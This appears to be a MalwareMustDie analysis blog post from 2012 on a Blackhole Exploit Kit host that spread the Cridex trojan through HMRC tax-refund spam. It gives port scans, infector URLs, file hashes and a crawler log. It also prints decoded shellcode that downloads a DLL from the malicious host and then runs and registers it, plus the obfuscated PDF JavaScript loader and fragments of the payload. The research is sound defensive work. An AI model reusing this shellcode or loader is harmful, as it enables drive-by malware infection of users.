I think I am careful enough in monitoring it, so I don't think they don't even sense to be monitored, which giving me much time to analyze it. Here's of what I found...
Background The spam email contains malicious link to this host on Sept 5th was - making me start to monitor this host. Maybe some of you still remember - this spam:So the moral of the story is : With BHEK infector domains lasts max up to 2days, with landing pages changes per one click on the BHEK2 and hourly on previous version, while they started using network tools for protection & C&C deployment, we have a strong opponent that we mustn't ignore.From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk] To: xxxx Sent: 05 September 2012 xx:xx (time was varied) Subject: Tax Refund Alert - Action Required How to complain, ask for a review or make an appeal Review process update Review process - the first 12 months. Find out more Claim Your Tax Refund Online We identified an error in the [link]↑This spam actually infected users w/Cridex. At that time the domain used was gdeounitrg.com and gsigallery.net URLQuery data is also showing a long list of reported malware infectors coming from this host, you can access it here--->>[CLICK] By that list ↑we can see the recent infector domain as per below↓virtual-geocaching.net cedarbuiltok.net thebummwrap.net afgreenwich.net bode-sales.net cat-mails.net centennialfield.net blue-lotusgrove.net dushare.netIf you see each report listed in↑URLQuery by date, you will know this host never use same domain more than 2 days(MAX). Since the url listed are landing page, I can assume email malvertising scheme. Services used: During the initial monitoring time I detected services as per below:21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 80/tcp open http 111/tcp open rpcbind 135/tcp open msrpc 136/tcp open profile 137/tcp open netbios-ns 138/tcp open netbios-dgm 139/tcp open netbios-ssn 389/tcp open ldap 636/tcp open ldapssl 1025/tcp open NFS-or-IIS 5000/tcp open UPnP 5050/tcp open mmcc 8009/tcp open ajp13 8080/tcp open http-proxyCouple days ago I realized it filtered their previously opened ports /services, and added some more too, which looks like this now:21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 80/tcp open http 111/tcp open rpcbind 135/tcp filtered msrpc <-----1 136/tcp filtered profile <-----1 137/tcp filtered netbios-ns <-----1 138/tcp filtered netbios-dgm <----1 139/tcp filtered netbios-ssn <-----1 389/tcp open ldap 445/tcp filtered microsoft-ds <-----1 636/tcp open ldapssl 1025/tcp filtered NFS-or-IIS <-------1 1337/tcp filtered waste 3001/tcp filtered nessusd <-----2 3128/tcp filtered squid-http <-----3 5000/tcp filtered UPnP 5050/tcp open mmcc 8009/tcp open ajp13 8080/tcp open http-proxy <---4Legend:= Windows services, it was never filtered previously = nessus scanner daemon service = squid proxy is running = http web server↑It filtered some tcp ports related to the windows services. To make sure this is still the same Windows server as before - I re-checked the OS fingerprint of it everyday:Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNWWhat's with the web services used (port 80 and 8080) Let's see what happened in port 8080GET / HTTP/1.1 User-Agent: blah Host: virtual-geocaching.net:8080 Accept: */* HTTP/1.1 200 OK Server: Apache-Coyote/1.1 <---- here Accept-Ranges: bytes ETag: W/"7777-1279522786000" Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT Content-Type: text/html Content-Length: 7777 Date: Tue, 18 Sep 2012 08:48:01 GMTWhile this is what happened in port 80GET / HTTP/1.1 User-Agent: blah Host: virtual-geocaching.net Accept: */* HTTP/1.1 403 Forbidden Server: nginx/1.3.3 <--- here Date: Tue, 18 Sep 2012 08:51:49 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 202 Connection: close↑So in TCP/8080 we'll see a tomcat & ngnix in TCP/80. Now we see ngnix, apache, file sharing, telnet, ssh, and ftp server. The filtered ports are: nessus for portscanning, and squid proxy which I probed to be set outbound. I saw some of blackhole hosts, but never see a guarded one w/heavy services running like this, morever NFS & LDAP services are also running too which suggesting us a possibility of records or maybe a C&C activity on it. OK, let's continue with what this BHEK actually does now.. Infector scheme and malwares Consulting to my EK mentor @kafein who kindly guide me in EK infection cases, what looked like old version of BHEK (1.2.5), since there are some changes - it's possible being upgraded to lastest BHEK v2, so I use a tool on freebsd box to check the infector scheme. We picked the latest infector structure from urlQuery:virtual-geocaching.net/main.php?page=7de3f5c4200c896e..And this is what I fetched as samples:↑all of these evil-mess is what user will get by clicking one infector url above. File details are as follows:
AcroPDF.PDF 50583375d345fb7a294e26094601699a 18406 field.swf d41d8cd98f00b204e9800998ecf8427e 0 Gam.jar ab4af9072132f170024a9072e0288459 32171 main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3 69023 shellcode.sc ac157a90724aec74a1de6e0a20d4db0d 466 wpbt0.dll/e88d779.exe 3158bc97bf424fcd905caa22b29767b9 119143While these are coming through below redirected urls of the infector:/main.php?page=7de3f5c4200c896e <--JS/Obfs Infector /Gam.jar <----- exploit java CVE-2012-1723/CVE-2012-4681 w/ shellcode /data/ap2.php <----PDF Malware Pdfka/EXP will shellcode /w.php?f=80f39&e=1 <---- payload EXE (Troj/CRIDEX dropped by JS/HTML shellcode) /w.php?f=80f39&e=2 <-----payload EXE (troj/CRIDEX dropped by PDF) /data/hhcp.php?c=80f39 <----0 byte (link for SWF) /data/field.swf <-- 0 byte supposed to be flash/shockwave /w.php?f=80f39&e=4 <--- url dropped to PDF shellcode↑The point of this scheme is to infect user with Trojan/Cridex The infector scheme is like follows: Landing page is HTML contains obfuscated JS/Code, neutralizedsample is here---->>[PASTEBIN] This code is deobfs'ed like this ---->>[PASTEBIN] There you can see the BHEK plugin detection code to exploit your browser via vulnerable sector, as per below route:Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE) PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE) DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE) Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE) JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE) SWF Exploit (field.swf) --> null (at least at this moment..) Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)The above scheme was recorded in log at my freebsd box below:[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None) [Navigator URL Translation] Gam.jar --> h00p://virtual-geocaching.net/Gam.jar [h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) Saving applet Gam.jar [Window] Eval argument length > 64 (33842) ActiveXObject: msxml2.xmlh00p ActiveXObject: acropdf.pdf Unknown ActiveX Object: shockwaveflash.shockwaveflash.15 Unknown ActiveX Object: shockwaveflash.shockwaveflash.14 Unknown ActiveX Object: shockwaveflash.shockwaveflash.13 Unknown ActiveX Object: shockwaveflash.shockwaveflash.12 Unknown ActiveX Object: shockwaveflash.shockwaveflash.11 ActiveXObject: shockwaveflash.shockwaveflash.10 Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0 Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0 Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0 Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0 ActiveXObject: javawebstart.isinstalled.1.7.1.0 Unknown ActiveX Object: javaplugin.171_40 Unknown ActiveX Object: javaplugin.171_39 Unknown ActiveX Object: javaplugin.171_38 Unknown ActiveX Object: javaplugin.171_37 Unknown ActiveX Object: javaplugin.171_36 Unknown ActiveX Object: javaplugin.171_35 Unknown ActiveX Object: javaplugin.171_34 Unknown ActiveX Object: javaplugin.171_33 Unknown ActiveX Object: javaplugin.171_32 Unknown ActiveX Object: javaplugin.171_31 ActiveXObject: javaplugin.171_30 ActiveXObject: javawebstart.isinstalled.1.7.1.0 [Navigator URL Translation] ./data/ap2.php --> h00p://virtual-geocaching.net/data/ap2.php [h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) [Navigator URL Translation] ./data/hhcp.php?c=80f39 --> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 [h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000 [h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9) [Navigator URL Translation] ./data/ap2.php --> h00p://virtual-geocaching.net/data/ap2.php [iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php [h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) [Navigator URL Translation] ./data/hhcp.php?c=80f39 --> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 [iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 [h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) [Navigator URL Translation] data/field.swf --> h00p://virtual-geocaching.net/data/field.swf [h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e) Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e) [Navigator URL Translation] data/field.swf --> h00p://virtual-geocaching.net/data/field.swf [h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)About #shellcode, we found 2 shellcodes, one is the one coded in the landing page, and the other one is coded in PDF file, say, shellcode 1 & 2. The shellcode1 decoded:BOOL VirtualProtectEx ( HANDLE = 0x298dda60 => none; LPCVOID = 0x298dda70 => none; DWORD dwSize = 255; DWORD flNewProtect = 64; PDWORD lpflOldProtectt = 64; ) = 0x1; HMODULE LoadLibraryA ( LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dl used ) = 0x7df20000; DWORD GetTempPathA ( DWORD nBufferLength = 248; LPTSTR = 0x298ddb00 => = "c:\tmp\"; ) = 0x7; HRESULT URLDownloadToFile ( //downloads... LPUNKNOWN = 0x28621a40 => none; LPCTSTR = 0x28621a48 => = "h00p://virtual-geocaching.net/w.php?f=80f39&e=1"; LPCTSTR = 0x298ddb50 => = "c:\tmp\wpbt0.dll"; // saved here... DWORD dwReserved = 0; LPBINDSTATUSCALLBACK lpfnCB = 0; ) = 0x0; UINT WINAPI WinExec ( // execute it here.. LPCSTR = 0x298ddb70 => = "c:\tmp\wpbt0.dll"; UINT uCmdShow = 0; ) = 0x20; UINT WINAPI WinExec ( LPCSTR = 0x298ddbb0 => = "regsvr32 -s c:\tmp\wpbt0.dll"; //register it... UINT uCmdShow = 0; ) = 0x20; BOOL TerminateThread ( HANDLE hThread = -2; // exit... DWORD dwExitCode = 0; ) = 0x0;While the other one shellcode 2 is so similar to it with aiming different download url:68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00 Means: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"For PDF infector, Most scanner cannot detect below evil script written in it:<xfa:script contentType='application/x-javascript'> with(event){ e=target["eval"]; if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;} } a=a.split("."); s=""; z=a; for(i in a){ zz=i; } for(i=0;i<zz;i++){ s+=String.fromCharCode(-33+1*z[i]); } e(""+s); </xfa:script>↑While the Subject object contains exploit & shellcode:<</Subject(130.145.145.79.130.141.134.147.149.94.134 77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit 92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8 1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89 .92.80.136.77.72.72.74.92.151.130.147.65.128.141.83. 1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81 141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1 : snip : CreationDate(66;83;e4;fc;fc;85;e4; //shelcode ;08;c1;cb;0d;03;da;40;eb;f1;3b;1f; ;05;ff;e3;68;6f;6e;00;00;68;75;72; ;c1;04;30;88;44;1d;04;41;51;6a;00;...blahThe payload itself is the PE file of Trojan/Cridex , which has the below analysis:Sample's MD5 3158bc97bf424fcd905caa22b29767b9 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP.... 0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J.. Compile Time: 2012-09-18 02:55:38 CRC Fail: Claimed: 0 Actual: 130407 Packer: PureBasic 4.x -> Neil Hodgson Sections: .code 0x1000 0x24cf 9728 .text 0x4000 0x23c8 9216 .rdata 0x7000 0x10 512 .data 0x8000 0xa8c 1536 Drops: %Appdata%\kb00085031.exe (payload) %Temp%\exp1.tmp %temp%\exp1.tmp.bat Collects information: HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled) HKLM\System\CurrentControlSet\Control\Terminal Server (TSUserEnabled ) At the time I got this only 3 AV products detected it: Symantec : W32.Cridex McAfee-GW-Edition : Heuristic.BehavesLike.Win32.Downloader.A Comodo : TrojWare.Win32.Trojan.Agent.GenI uploaded samples to Virus Total to check/monitor RECENT detection ratio:
#MalwareMustDie!
